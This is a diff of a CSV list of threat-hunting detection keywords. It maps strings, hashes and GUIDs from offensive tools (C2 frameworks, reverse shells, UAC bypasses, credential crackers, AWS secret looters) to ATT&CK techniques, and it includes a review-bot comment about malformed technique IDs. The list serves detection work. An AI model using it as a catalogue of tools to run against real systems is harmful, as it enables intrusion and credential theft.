TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*awk_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" "*aws configure --profile exegol*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*awsloot.py *","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","0","N/A","N/A","1","64","14","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" -"*axcrypt2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*aydinnyunus/PassDetective*","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","1","N/A","7","1","51","3","2023-08-16T16:51:15Z","2023-07-22T12:31:57Z" -"*azfvgayqKwtFApcvyRedpUXculaeCCGA*","offensive_tool_keyword","SetProcessInjection","alternate 
technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","1","53","10","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" +"*axcrypt2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*aydinnyunus/PassDetective*","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","1","N/A","7","1","52","3","2023-08-16T16:51:15Z","2023-07-22T12:31:57Z" +"*azfvgayqKwtFApcvyRedpUXculaeCCGA*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","1","64","12","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" "*Azure-AccessPermissions.ps1*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","1","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" 
"*Azure-AccessPermissions-master*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","1","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*AzureAD AutoLogon Brute*","offensive_tool_keyword","AzureAD_Autologon_Brute","Brute force attack tool for Azure AD Autologon","T1110 - T1078 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/AzureAD_Autologon_Brute","1","0","N/A","N/A","1","96","22","2023-02-17T20:11:27Z","2021-10-01T05:20:25Z" 
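Review bot: The Metasploit rows rewritten in this hunk (`*auxiliary/crawler*`, `*auxiliary/sqli/*`, `*av_hips_executables.txt*`, `*avast_memory_dump.md*`, `*av-update-urls.txt*`) still carry `T1204 -T1210` in metadata_tool_techniques, with no space before the hyphen. Every other row in view separates technique IDs with ` - `, so a consumer that splits on that delimiter would presumably get the single malformed token `T1204 -T1210` and lose both IDs from the ATT&CK mapping of these detections; the field should read `T1204 - T1210`. The same list also contains T1024, T1064 and T1075, which I believe are deprecated in current ATT&CK, so they are worth checking against the current matrix while these rows are being touched. If the rows are produced by a script (the change here looks like a star/fork counter refresh), a validation step that requires every token to match `T\d{4}(\.\d{3})?` would catch this on each refresh.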
@@ -7478,46 +7623,47 @@ "*AzureADRecon.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" "*AzureC2Relay.zip*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*AzureC2Relay-main*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" -"*AzureHound.ps1*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. 
Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","8799","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" -"*azurehound/v2*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","8799","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" -"*-b bleeding-jumbo*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*b12885f92d7691b2823d2b921b7dda440cbcc4c6aa5a3b7c3e9e6f7af4772397*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*b1b79e79880d60412e41d43b5e9ef936fdb3e66ad85e47fc0e1261ed07322d06*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*b22c6d2722fa9e917746502fd4615d28b9c889d7288fc737315150e0ae40ee6f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*AzureHound.ps1*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. 
built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*azurehound/v2*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*-b bleeding-jumbo*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*b12885f92d7691b2823d2b921b7dda440cbcc4c6aa5a3b7c3e9e6f7af4772397*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*b1b79e79880d60412e41d43b5e9ef936fdb3e66ad85e47fc0e1261ed07322d06*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*b22c6d2722fa9e917746502fd4615d28b9c889d7288fc737315150e0ae40ee6f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*b23r0/Heroinn*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - 
T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*b23r0/rsocx*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","1","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" -"*b289e30ce698eb0402babc2788ac7022b6a7db161296182e0e13fd021a3bee03*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*b289e30ce698eb0402babc2788ac7022b6a7db161296182e0e13fd021a3bee03*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*b2xtranslator.xls.csproj*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" -"*B374K*index.php*","offensive_tool_keyword","b374k","This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel. 
connecting using ssh. ftp etc. All actions take place within a web browser","T1021 - T1028 - T1071 - T1105 - T1135","TA0002 - TA0003 - TA0005","N/A","N/A","Web Attacks","https://github.com/b374k/b374k","1","0","N/A","N/A","10","2248","783","2023-07-06T20:23:03Z","2014-01-09T04:43:32Z" +"*B374K*index.php*","offensive_tool_keyword","b374k","This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel. connecting using ssh. ftp etc. All actions take place within a web browser","T1021 - T1028 - T1071 - T1105 - T1135","TA0002 - TA0003 - TA0005","N/A","N/A","Web Attacks","https://github.com/b374k/b374k","1","0","N/A","N/A","10","2249","783","2023-07-06T20:23:03Z","2014-01-09T04:43:32Z" "*b3rito*yodo*","offensive_tool_keyword","yodo","This tool proves how easy it is to become root via limited sudo permissions. via dirty COW or using Pa(th)zuzu. ","T1068 - T1078 - T1529","TA0004 - TA0008","N/A","N/A","Exploitation tools","https://github.com/b3rito/yodo","1","1","N/A","N/A","3","202","34","2017-02-28T15:38:13Z","2016-11-13T21:02:03Z" -"*b419f6b7b8d24dc61e7473092a8326720ef54e1f65cc185da0c6e080c9debb94*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*b419f6b7b8d24dc61e7473092a8326720ef54e1f65cc185da0c6e080c9debb94*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*B473B9A4135DE247C6D76510B40F63F8F1E5A2AB*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and 
Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" "*b4rtik/RedPeanut*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*b4rtik/RedPeanut*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1095 - T1071.004","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*B5627919-4DFB-49C6-AC1B-C757F4B4A103*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*B5A3FA5B3DA95F6AA7556EE2BC62E5D290F72453105EF88E170174994DDA2650*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" -"*B64_ENCODED_PAYLOAD_UUID*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - 
T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*B64_ENCODED_PAYLOAD_UUID*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*b64encode*.:::-989-:::.*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*b64payloadgen.sh*","offensive_tool_keyword","POC","exploitation of CVE-2021-4034","T1210","N/A","N/A","N/A","Exploitation tools","https://github.com/luijait/PwnKit-Exploit","1","1","N/A","N/A","1","79","14","2022-02-07T15:42:00Z","2022-01-26T18:01:26Z" "*b64stager*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" -"*B651A53C-FAE6-482E-A590-CA3B48B7F384*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - 
T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" -"*B67143DE-321D-4034-AC1D-C6BB2D98563F*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" -"*B67143DE-321D-4034-AC1D-C6BB2D98563F*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" -"*b7671f125bb2ed21d0476a00cfaa9ed6*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. 
By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" -"*b774446d2f110ce954fb0a710f4693c5562ddbd8d56fe84106f2ee80db8b50a2*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*b7dec074f463b0be08dd3a707495e45c7a629502fa6dd7ef972a74a2aff72632*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*ba8fe35020bcd560c0f100bda43c2311bfdbb97aafbe367ac5077cebca59287f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*B651A53C-FAE6-482E-A590-CA3B48B7F384*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" 
+"*B67143DE-321D-4034-AC1D-C6BB2D98563F*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*B67143DE-321D-4034-AC1D-C6BB2D98563F*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*b7671f125bb2ed21d0476a00cfaa9ed6*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*b774446d2f110ce954fb0a710f4693c5562ddbd8d56fe84106f2ee80db8b50a2*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*b7dec074f463b0be08dd3a707495e45c7a629502fa6dd7ef972a74a2aff72632*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" 
+"*ba8fe35020bcd560c0f100bda43c2311bfdbb97aafbe367ac5077cebca59287f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*babelstrike.py -*","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","0","N/A","1","1","38","13","2023-09-12T13:49:30Z","2023-01-10T07:59:00Z" "*BabelStrike-main*","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. 
from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","1","N/A","1","1","38","13","2023-09-12T13:49:30Z","2023-01-10T07:59:00Z" -"*Backdoor LNK*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","0","N/A","10","10","448","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*Backdoor LNK*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
